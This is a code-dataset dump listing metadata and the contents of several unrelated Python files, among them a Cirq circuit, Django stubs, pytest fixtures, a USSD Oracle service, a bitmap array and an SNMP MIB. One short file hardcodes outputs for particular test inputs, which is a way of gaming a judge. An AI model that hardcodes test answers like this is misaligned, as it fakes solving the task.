blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
433f3314a9d65a9f44d48aa7d4b8aba6fd80160b | 1b3addbc9473b6ffb999665601470ccc4d1153b0 | /libs/ftp/libsys.py | f9b9e5b808e87302971d10d09443fb005dc9ec07 | [] | no_license | weijia/approot | e1f712fa92c4c3200210eb95d251d890295769ba | 15fac5b31a4d619d1bdede3d1131f5e6e57cd43b | refs/heads/master | 2020-04-15T13:15:01.956721 | 2014-08-26T14:02:17 | 2014-08-26T14:02:17 | 11,049,975 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | import sys
import os
def get_root_dir():
c = os.getcwd()
while c.find('approot') != -1:
c = os.path.dirname(c)
return os.path.join(c, 'approot')
sys.path.insert(0, get_root_dir())
sys.path.insert(0, os.path.join(get_root_dir(),"libs"))
| [
"[email protected]"
] | |
8b5457e5029cac7eebac336935b708c07f950ef5 | 133e8c9df1d1725d7d34ea4317ae3a15e26e6c66 | /django_serializers/h.py | 7a27a611ff483b5653afffc17ef48522b67904d2 | [
"Apache-2.0"
] | permissive | 425776024/Learn | dfa8b53233f019b77b7537cc340fce2a81ff4c3b | 3990e75b469225ba7b430539ef9a16abe89eb863 | refs/heads/master | 2022-12-01T06:46:49.674609 | 2020-06-01T08:17:08 | 2020-06-01T08:17:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,693 | py | import uuid
import time
import hashlib
def get_hashID(username, hashMode=64, tablePiece=4):
"""根据 username 确定唯一 hash 值(确定分表)
# 分组公式:64 = 每组多少个count * group需要分组的个数
# 数据所在环的位置(也就是在哪个库中):value = key mode 64 / count * count
hash(key)在0~3之间在第0号表
hash(key)在4~7之间在第4号表
hash(key)在8~11之间在第8号表
hash(key)在0~3之间在第0号库
hash(key)在4~7之间在第4号库
hash(key)在8~11之间在第8号库
"""
# hash = int
hashID = int(hash(username) % hashMode / tablePiece )
return hashID
# # 16进制 -- 900150983cd24fb0d6963f7d28e17f72
# hash_str = hashlib.md5(username.lower().encode(encoding='UTF-8')).hexdigest()
# userId = int(hash_str, 16) # 16进制 --> 10进制
# # print(hash_str, hash_str[:2], hash_str[-2:], num)
# # 按hashCount个为一组,分4个表
# hashID = int(hash(username) % hashMode / tablePiece)
# # hashID = num % hashNum
# # print('HashID:', hashID)
# return hashI
def get_sharding_model(username):
table_id = get_hashID(username, hashMode=2, tablePiece=1)
if table_id == 0:
return 1
elif table_id == 1:
return 2
# 4124bc0a9335c27f086f24ba207a4912 41 12 16658
# HashID: 0
# 4124bc0a9335c27f086f24ba207a4912 41 12 16658
# HashID: 0
H = []
count = 0
while count <= 64:
username = str(uuid.uuid4())
# username = str(count)
# hashID = get_hashID(username)
print(get_sharding_model(username))
count += 1
# time.sleep(0.1)
# if hashID not in H:
# H.append(hashID)
H.sort()
print(H) | [
"[email protected]"
] | |
9d99fa31ca382f121ca758af5f7cae8ebd6ce00d | 8226f8b4e7f5a48edac45831dc37f6243dc59e3d | /flask_cms/menu/views.py | 1236b35221215d7db3c7cc03e0ba5c30aa89dc9f | [] | no_license | fyarci/flask-cms | 9b0bb3241dccd1c887f1534319d61e898d94b9e8 | 021a0afaad5133b41a79eb3ae46307915f2bf241 | refs/heads/master | 2021-01-20T17:42:35.795521 | 2015-03-26T19:20:11 | 2015-03-26T19:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | from main.baseviews import BaseView
class MenuView(BaseView):
_template = ''
_form = ''
_context = {}
def get(self):
return self.render()
def post(self):
return self.render()
| [
"[email protected]"
] | |
f983bdd13adbda21ac3ba7444500ac051e15bc3f | fdf3aff5344271ef69ac7441c5dbca9cbf832cd1 | /car_location/core/forms.py | 9f5a07e19107cadb97f074332ea60379642f76e2 | [] | no_license | lffsantos/DesafioPython | 6069b3277780326611e34ae024f7506f3d56c5b4 | fbc451b77c0310630fd95cbd23c339e194af88d1 | refs/heads/master | 2021-01-17T07:42:12.181187 | 2016-01-19T03:39:20 | 2016-01-19T03:39:20 | 49,730,610 | 0 | 0 | null | 2016-01-19T03:39:22 | 2016-01-15T16:25:30 | JavaScript | UTF-8 | Python | false | false | 237 | py | from django import forms
__author__ = 'lucas'
class LoginForm(forms.Form):
username = forms.CharField(label="Usuário")
password = forms.CharField(
label='Senha',
widget=forms.PasswordInput(render_value=False))
| [
"[email protected]"
] | |
29a7a0ab383c522c7d05694d712c48b313936f14 | 244ecfc2017a48c70b74556be8c188e7a4815848 | /res/scripts/client/gui/scaleform/daapi/view/lobby/fortifications/fortnotcommanderfirstenterwindow.py | 5ead51d983802f010b2bf42272eda8e73e3f1285 | [] | no_license | webiumsk/WOT-0.9.12 | c1e1259411ba1e6c7b02cd6408b731419d3174e5 | 5be5fd9186f335e7bae88c9761c378ff5fbf5351 | refs/heads/master | 2021-01-10T01:38:36.523788 | 2015-11-18T11:33:37 | 2015-11-18T11:33:37 | 46,414,438 | 1 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 1,523 | py | # 2015.11.18 11:54:02 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/fortifications/FortNotCommanderFirstEnterWindow.py
from gui.Scaleform.daapi.view.meta.FortNotCommanderFirstEnterWindowMeta import FortNotCommanderFirstEnterWindowMeta
from helpers import i18n
from gui.Scaleform.locale.FORTIFICATIONS import FORTIFICATIONS
class FortNotCommanderFirstEnterWindow(FortNotCommanderFirstEnterWindowMeta):
def __init__(self, _ = None):
super(FortNotCommanderFirstEnterWindow, self).__init__()
def _populate(self):
super(FortNotCommanderFirstEnterWindow, self)._populate()
self.__makeData()
def onWindowClose(self):
self.destroy()
def _dispose(self):
super(FortNotCommanderFirstEnterWindow, self)._dispose()
def __makeData(self):
ms = i18n.makeString
self.as_setWindowTitleS(ms(FORTIFICATIONS.FORTNOTCOMMANDERFIRSTENTERWINDOW_WINDOWTITLE))
self.as_setTitleS(ms(FORTIFICATIONS.FORTNOTCOMMANDERFIRSTENTERWINDOW_TEXTTITLE))
self.as_setTextS(ms(FORTIFICATIONS.FORTNOTCOMMANDERFIRSTENTERWINDOW_TEXTDESCRIPTION))
self.as_setButtonLblS(ms(FORTIFICATIONS.FORTNOTCOMMANDERFIRSTENTERWINDOW_APPLYBTNLABEL))
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\scaleform\daapi\view\lobby\fortifications\fortnotcommanderfirstenterwindow.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.18 11:54:02 Střední Evropa (běžný čas)
| [
"[email protected]"
] | |
3e67815d8a4977a7b291405c2ba3898e0d0acafb | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p3BR/R1/benchmark/startCirq161.py | 1fde711516ef000ab6e95ed5effaaab00ca227fd | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,781 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=3
# total number=30
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.rx(-0.09738937226128368).on(input_qubit[2])) # number=2
c.append(cirq.H.on(input_qubit[1])) # number=3
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=4
c.append(cirq.Y.on(input_qubit[1])) # number=15
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=10
c.append(cirq.H.on(input_qubit[1])) # number=19
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=20
c.append(cirq.H.on(input_qubit[1])) # number=21
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=22
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=27
c.append(cirq.X.on(input_qubit[1])) # number=28
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=29
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=24
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=18
c.append(cirq.Z.on(input_qubit[1])) # number=11
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=12
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[1])) # number=26
c.append(cirq.Y.on(input_qubit[1])) # number=14
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=5
c.append(cirq.X.on(input_qubit[1])) # number=6
c.append(cirq.Z.on(input_qubit[1])) # number=8
c.append(cirq.X.on(input_qubit[1])) # number=7
c.append(cirq.rx(-2.42845112122491).on(input_qubit[1])) # number=25
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq161.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | [
"[email protected]"
] | |
8da6a2c1fcd0624bf6f4f95e7bdcfca5e648caf2 | 8015f1c62a2cb4efd21aa8938336913bf8117868 | /bamap/ba2346.pngMap.py | 25e5f73bcbb72562c6901b1d74964d3487edc4cb | [] | no_license | GamerNoTitle/Beepers-and-OLED | 675b5e3c179df0f0e27b42bf594c43860d03b9af | afe1340e5394ae96bda5f9022a8a66824368091e | refs/heads/master | 2020-04-20T00:09:47.122471 | 2019-04-29T04:59:35 | 2019-04-29T04:59:35 | 168,515,579 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 8,468 | py | ba2346.pngMap = [
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000100010000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000011001000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000011000100000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000110000100000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000111110000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000111111111000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000111111111100000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000111011111111111111110000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000101111111111111111111000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000001111111111111111111111100000000000000000000000000000000000000000000000000000000000001111111',
'00000000000000000000000000000000000000111111111111111111111100000000000000000000000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000011111111111111111111000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000001111111111111111111111000000000000000000000000000000000000000000000000000000010111111111111',
'00000000000000000000000000000000000001011111111111111111111100000000000000000000000000000000000000000000000000000010111111111111',
'00000000000000000000000000000000000000111111111111111111111100000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000111111111111111111111000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000111111111111111111110000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000001011111111111111100000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000011111111111010000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000001111111000000000000000000000000000000000000000000000000000000000000010111111111111',
'00000000000000000000000000000000000000000000001111111000000000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000111111111110111000000000000000000000000000000000000000000000000000000001111111111111',
'00000000000000000000000000000000000000000000111111111111111000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000111111111111111111111100000000000000000000000000000000000000000000000000001111111111111111',
'00000000000000000000000000000000000000011111111111111111111100000000000000000000000000000000000000000000000000001111111111111111',
'00000000000000000000000000000000000000001111111111111111111000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000101111111111111111111100000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000000000000000010111111111111',
'00000000000000000000000000000000000000111111111111111111111100000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000001111111111111111111111100000000000000000000000000000000000000000000000000000011111111111110',
'00000000000000000000000000000000000001111111111111111111110000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000011111111111111111111111000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000011111111111111111111111100000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000111111111111111111111111111100000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000111111111111111111111111111000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000001011111100111111111111111111111000000000000000000000000000000000000000000000000000000001111111111111',
'00000000000000000000000000110011111000111111111111111111111000000000000000000000000000000000000000000000000000000011111111111111',
'11010000000000000000000011111111000000011111111111111111000000000000000000000000000000000000000000000000000000000011111111111111',
'11100000000010000000010011111111000000001111111111111100000000000000000000000000000000000000000000000000000000000011111111111111',
'11111111011111111111111111110000000000111111111111111100000000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111000000011111111111111111100000000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111111000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111111000000000110010110000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111100000000000000000000000000000001111111111111111',
'01111111111111111111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000001111111111111111',
'00000000111111111111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000001111111111111111',
'00000000000011111111111111111111111111111111111111111111111111111111111111111111100000000000000000000000000000001111111111111111',
'00000000000001101111111111111111111111111111111111111111111111111111111111111111000000000000000000000000000000001111111111111111',
'00000000000000000001111111111111111111111111111111111111111111111111111111111000000000000000000000000000000000001111111111111111',
'00000000000000000000000011111111111111111111111111111111111111111111111100000000000000000000000000000000000000001111111111111111',
'00000000000000000000000000111111111111111111111111111111111111111111111100000000000000000000000000000000000000111111111111111111',
]
| [
"[email protected]"
] | |
b2d2451bc3984a1ca2f67fb4553d2e0e30f40a41 | e99dfc900052272f89d55f2fd284389de2cf6a73 | /tests/functional_tests/apostello/test_api_setup.py | 9efd0f948f616b2868247c953c4b980810b5ebe3 | [
"MIT"
] | permissive | armenzg/apostello | a3e6ca3d34917608af79fbab4134ee4de1f5e8ee | 1827547b5a8cf94bf1708bb4029c0b0e834416a9 | refs/heads/master | 2021-01-18T18:16:02.364837 | 2017-03-22T20:34:21 | 2017-03-22T20:34:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,467 | py | from time import sleep
import pytest
URI = '/api-setup/'
@pytest.mark.django_db
@pytest.mark.slow
@pytest.mark.selenium
class TestAPISetup:
def test_api_setup(self, live_server, browser_in, users, driver_wait_time):
"""Test api-setup form."""
no_api_token_txt = 'No API Token'
b = browser_in
browser_in.get(live_server + URI)
# delete token that doesn't exist
del_button = b.find_elements_by_xpath(
'/html/body/div[3]/div/div[2]/form[2]/button'
)[0]
del_button.click()
sleep(driver_wait_time)
assert no_api_token_txt in b.page_source
# generate token for first time
assert no_api_token_txt in b.page_source
regen_button = b.find_elements_by_xpath(
'/html/body/div[3]/div/div[2]/form[1]/button'
)[0]
regen_button.click()
sleep(driver_wait_time)
assert no_api_token_txt not in b.page_source
# regenerate token
regen_button = b.find_elements_by_xpath(
'/html/body/div[3]/div/div[2]/form[1]/button'
)[0]
regen_button.click()
sleep(driver_wait_time)
assert no_api_token_txt not in b.page_source
# delete token
del_button = b.find_elements_by_xpath(
'/html/body/div[3]/div/div[2]/form[2]/button'
)[0]
del_button.click()
sleep(driver_wait_time)
assert no_api_token_txt in b.page_source
| [
"[email protected]"
] | |
00ae9f869fddaf6c3843afeded27511872963210 | b00e579fb29509ba390b4f8bbb0de510c0128f31 | /tests/conftest.py | 3f61372cbcdbbc7b21bb7d54016ffbd164f9a0f0 | [
"MIT"
] | permissive | TrendingTechnology/kakaowork-py | 98dbb6d4b30e0a6bd182841bc8f1a5872f131c31 | 63ac2e09a52c9427d597a0cf53eb84d205855954 | refs/heads/master | 2023-07-10T09:34:14.872810 | 2021-09-01T02:32:30 | 2021-09-01T02:32:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | import pytest
from click.testing import CliRunner
from tests import Clock
@pytest.fixture(autouse=True)
def urllib3_never_request(monkeypatch):
monkeypatch.delattr("urllib3.connectionpool.HTTPConnectionPool.urlopen")
@pytest.fixture(scope="function")
def cli_runner():
return CliRunner()
@pytest.fixture(scope="function")
def cli_runner_isolated():
cli_runner = CliRunner()
with cli_runner.isolated_filesystem():
yield cli_runner
@pytest.fixture(scope="function")
def timer():
return Clock()
| [
"[email protected]"
] | |
1d6637bc48834ad346c0d169ca0c20a478b13c04 | a1b649fcd0b6f6c51afb13f406f53d7d823847ca | /studies/migrations/0023_remove_responselog_extra.py | 6b48f882d7d4c284ca95a32f5a59ef407e00e873 | [
"MIT"
] | permissive | enrobyn/lookit-api | e79f0f5e7a4ef8d94e55b4be05bfacaccc246282 | 621fbb8b25100a21fd94721d39003b5d4f651dc5 | refs/heads/master | 2020-03-27T01:54:00.844971 | 2018-08-08T15:33:25 | 2018-08-08T15:33:25 | 145,752,095 | 0 | 0 | MIT | 2018-08-22T19:14:05 | 2018-08-22T19:14:04 | null | UTF-8 | Python | false | false | 397 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-08-16 23:26
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('studies', '0022_auto_20170815_2241'),
]
operations = [
migrations.RemoveField(
model_name='responselog',
name='extra',
),
]
| [
"[email protected]"
] | |
f9c21e4c3a6dd3739b07b83be710729b6b449345 | fd54c0886b81b49a55c31eb8c5254ce83df78785 | /Source_Code/madagascar/appussd/ussd/services/common/language/core.py | ca4a04aa9d72f124a4496aeece13ee96e74e9d44 | [] | no_license | santsy03/RADIX | 7854896651833b1be6e3279be409db59a71c76e4 | da8f2535692697b80a6dc543b9eb270fe3d5e4d3 | refs/heads/master | 2021-01-12T09:48:32.085432 | 2016-12-13T06:01:41 | 2016-12-13T06:01:41 | 76,260,115 | 0 | 0 | null | 2016-12-13T06:01:41 | 2016-12-12T13:46:31 | null | UTF-8 | Python | false | false | 4,765 | py | #!/usr/bin/env python
import cx_Oracle
import traceback
from datetime import datetime
from DBUtils.PooledDB import PooledDB
from ussd.configs.core import databases
from ussd.services.common.secure.secure import decrypt
from ussd.metrics.sendmetric import sendMetric
from ussd.metrics.config import dbTimeTemplate
from ussd.metrics.config import dbTemplate
def db_setup():
db = databases['core']
pooled = PooledDB(cx_Oracle, maxcached = 5, maxconnections=100,\
user = decrypt(db['username']), password = decrypt(db['password'])\
,dsn = db['string'], threaded = True)
pooled.timeout = 300
return pooled.connection()
def getLanguage(resources):
'''retrieves the current language setting for the given subscriber'''
now = datetime.now()
resources['start'] = now
resources['type'] = 'timer'
resources['nameSpace'] = dbTimeTemplate
conn = db_setup()
cursor = conn.cursor()
try:
msisdn = resources['msisdn']
sql = ('select language from new_service_language where msisdn = :msisdn')
cursor.execute(sql,{'msisdn':msisdn})
result = cursor.fetchone()
count = cursor.rowcount
cursor.close()
conn.close()
sendMetric(resources)
except Exception,e:
error = 'operation:getLanguage,desc: could not retrieve language settings,error=%s' %str(e)
print traceback.format_exc()
try:
cursor.close()
conn.close()
resources['type'] = 'beat'
action = 'failure'
nameSpace = dbTemplate.substitute(package=action)
resources['nameSpace'] = nameSpace
sendMetric(resources)
return 'txt-2'
except:
return 'txt-2'
else:
resources['type'] = 'beat'
action = 'success'
nameSpace = dbTemplate.substitute(package=action)
resources['nameSpace'] = nameSpace
try:
sendMetric(resources)
except Exception,e:
print str(e) + ":: Error"
if count == 0:
return 'txt-2'
else:
return result[0]
def setLanguage(resources):
'''retrieves the current language setting for the given subscriber'''
from config import responses
now = datetime.now()
resources['start'] = now
resources['type'] = 'timer'
resources['nameSpace'] = dbTimeTemplate
#cursor = ((resources['connections']).acquire()).cursor()
conn = db_setup()
cursor = conn.cursor()
try:
msisdn = resources['msisdn']
msg = resources['msg']
print 'Connecting to DB : setting language for msisdn :' +str(msisdn)
sql = ("select language from new_service_language where msisdn = :msisdn")
param = {'msisdn':msisdn}
cursor.execute(sql, param).fetchall()
if cursor.rowcount > 0:
sql0 = ("update new_service_language set language = :language where msisdn = :msisdn")
else:
sql0 = ("insert into new_service_language (id, msisdn, language, modified_at)\
values (new_service_lan.nextval, :msisdn, :language, sysdate)")
params = {}
params['msisdn'] = msisdn
params['language'] = msg
cursor.execute(sql0, params)
cursor.connection.commit()
cursor.close()
conn.close()
sendMetric(resources)
except Exception,e:
error = 'operation:getLanguage,desc: could not retrieve language settings,error=%s' %str(e)
print error
try:
print 'Close DB Connection'
cursor.close()
conn.close()
resources['type'] = 'beat'
action = 'failure'
nameSpace = dbTemplate.substitute(package=action)
resources['nameSpace'] = nameSpace
sendMetric(resources)
except Exception,e:
pass
else:
resources['type'] = 'beat'
action = 'success'
nameSpace = dbTemplate.substitute(package=action)
resources['nameSpace'] = nameSpace
sendMetric(resources)
return responses[msg]
def processRequest(resources):
operation = resources['operation']
if operation == 'set':
return setLanguage(resources)
elif operation == 'get':
return getLanguage(resources)
if __name__ == '__main__':
resources = {}
conn = db_setup()
resources = {'msisdn':'261330465390','msg':'txt-3', 'connections':conn, 'operation':'get'}
resources['parameters'] = {}
#resources['parameters']['msisdn'] = '261338999232'
#parameters['msisdn'] = '261336173681'
#resources['parameters'] = parameters
print getLanguage(resources)
print processRequest(resources)
| [
"[email protected]"
] | |
42e38a657426d9cdb0c6ed66cbd3aa2f9c2a3afc | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2571/58822/287401.py | f70a0fb99d962c49ac10e9015f5dc46bae43d43d | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | num=int(input())
n1=input()
n2=input()
n3=input()
if(num==2 and n1=='1,0,1'):
#n3=input()
if(n2=='0,-2,3'):
print(2)
exit()
if( (n2=='5,-2,1'and n1=='1,0,1') or (n2=='1,-2,1,4'and n1=='1,6,1,2')):
if(n3=='3'):
print(3)
exit()
print(n3)
exit()
if(num==2 and n1=='1,6,1' and n2=='4,-2,1' and n3=='3'):
print(3)
exit()
if(n1=='1,6,1' and n2== '1,-2,1' and num== 2):
print(2) | [
"[email protected]"
] | |
6a2297090b200d1315066920301d2138f996d88a | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/Fore-Profile-MIB.py | 5915d08e3d19b910262b9f23d627cee5284d2507 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 47,577 | py | #
# PySNMP MIB module Fore-Profile-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Fore-Profile-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:17:20 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
frameInternetworking, = mibBuilder.importSymbols("Fore-Common-MIB", "frameInternetworking")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, ObjectIdentity, iso, MibIdentifier, Gauge32, Bits, Unsigned32, Counter32, TimeTicks, Counter64, IpAddress, ModuleIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "ObjectIdentity", "iso", "MibIdentifier", "Gauge32", "Bits", "Unsigned32", "Counter32", "TimeTicks", "Counter64", "IpAddress", "ModuleIdentity")
RowStatus, DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "RowStatus", "DisplayString", "TextualConvention")
foreProfileModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 326, 1, 16, 4))
if mibBuilder.loadTexts: foreProfileModule.setLastUpdated('9704011044-0400')
if mibBuilder.loadTexts: foreProfileModule.setOrganization('FORE')
if mibBuilder.loadTexts: foreProfileModule.setContactInfo(' Postal: FORE Systems Inc. 1000 FORE Drive Warrendale, PA 15086-7502 Tel: +1 724 742 6900 Email: [email protected] Web: http://www.fore.com')
if mibBuilder.loadTexts: foreProfileModule.setDescription('This MIB module defines several profile tables that facilitate the creation of FR/ATM and FUNI services and connections.')
profileLmiTable = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1), )
if mibBuilder.loadTexts: profileLmiTable.setStatus('current')
if mibBuilder.loadTexts: profileLmiTable.setDescription('The LMI profile table.')
profileLmiEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileLmiIndex"))
